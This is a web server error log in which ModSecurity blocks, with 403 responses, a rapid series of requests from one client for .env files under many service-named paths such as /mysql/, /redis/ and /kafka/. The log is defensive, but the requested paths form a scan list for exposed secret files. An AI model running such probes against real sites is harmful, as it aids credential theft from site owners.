[Mon May 11 17:36:33.417610 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/actions/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuxwAAANM"]
[Mon May 11 17:36:33.417867 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/actions/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuxwAAANM"]
[Mon May 11 17:36:33.748178 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/circleci/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuyQAAANM"]
[Mon May 11 17:36:33.748487 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/circleci/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuyQAAANM"]
[Mon May 11 17:36:33.748830 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/circleci/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuyQAAANM"]
[Mon May 11 17:36:34.014609 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/travis/.env"] [unique_id "agH3glV4kyjgo4bQBUhuygAAANM"]
[Mon May 11 17:36:34.014836 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/travis/.env"] [unique_id "agH3glV4kyjgo4bQBUhuygAAANM"]
[Mon May 11 17:36:34.015125 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/travis/.env"] [unique_id "agH3glV4kyjgo4bQBUhuygAAANM"]
[Mon May 11 17:36:34.239980 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/buildkite/.env"] [unique_id "agH3glV4kyjgo4bQBUhuywAAANM"]
[Mon May 11 17:36:34.240220 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/buildkite/.env"] [unique_id "agH3glV4kyjgo4bQBUhuywAAANM"]
[Mon May 11 17:36:34.240471 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/buildkite/.env"] [unique_id "agH3glV4kyjgo4bQBUhuywAAANM"]
[Mon May 11 17:36:34.430573 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mysql/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzAAAANM"]
[Mon May 11 17:36:34.430796 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mysql/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzAAAANM"]
[Mon May 11 17:36:34.431045 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mysql/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzAAAANM"]
[Mon May 11 17:36:34.674738 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/postgres/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzQAAANM"]
[Mon May 11 17:36:34.674960 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/postgres/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzQAAANM"]
[Mon May 11 17:36:34.675205 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/postgres/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzQAAANM"]
[Mon May 11 17:36:34.980636 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mongodb/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzgAAANM"]
[Mon May 11 17:36:34.980859 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mongodb/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzgAAANM"]
[Mon May 11 17:36:34.981086 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mongodb/.env"] [unique_id "agH3glV4kyjgo4bQBUhuzgAAANM"]
[Mon May 11 17:36:35.258805 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/redis/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0AAAANM"]
[Mon May 11 17:36:35.259100 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/redis/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0AAAANM"]
[Mon May 11 17:36:35.259371 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/redis/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0AAAANM"]
[Mon May 11 17:36:35.430508 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/elasticsearch/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0QAAANM"]
[Mon May 11 17:36:35.430734 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/elasticsearch/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0QAAANM"]
[Mon May 11 17:36:35.430999 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/elasticsearch/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0QAAANM"]
[Mon May 11 17:36:35.661604 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/rabbitmq/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0gAAANM"]
[Mon May 11 17:36:35.661848 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/rabbitmq/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0gAAANM"]
[Mon May 11 17:36:35.662104 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/rabbitmq/.env"] [unique_id "agH3g1V4kyjgo4bQBUhu0gAAANM"]
[Mon May 11 17:36:36.039974 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/kafka/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu0wAAANM"]
[Mon May 11 17:36:36.040217 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/kafka/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu0wAAANM"]
[Mon May 11 17:36:36.040576 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/kafka/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu0wAAANM"]
[Mon May 11 17:36:36.268231 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/queue/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu1AAAANM"]
[Mon May 11 17:36:36.268460 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/queue/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu1AAAANM"]
[Mon May 11 17:36:36.268719 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/queue/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu1AAAANM"]
[Mon May 11 17:36:36.460376 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/worker/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu1QAAANM"]
[Mon May 11 17:36:36.460599 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/worker/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu1QAAANM"]
[Mon May 11 17:36:36.460840 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/worker/.env"] [unique_id "agH3hFV4kyjgo4bQBUhu1QAAANM"]
[Mon May 11 17:36:36.509014 2026] [ssl:error] [pid 1424905:tid 1424932] (EAI 2)Name or service not known: [client 137.184.127.13:40406] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:36.509048 2026] [ssl:error] [pid 1424905:tid 1424932] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:37.426880 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/job/.env"] [unique_id "agH3hfy_GXSWIKeli0sN1wAAAJQ"]
[Mon May 11 17:36:37.427963 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.144.25.17:41514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/job/.env"] [unique_id "agH3hfy_GXSWIKeli0sN1wAAAJQ"]
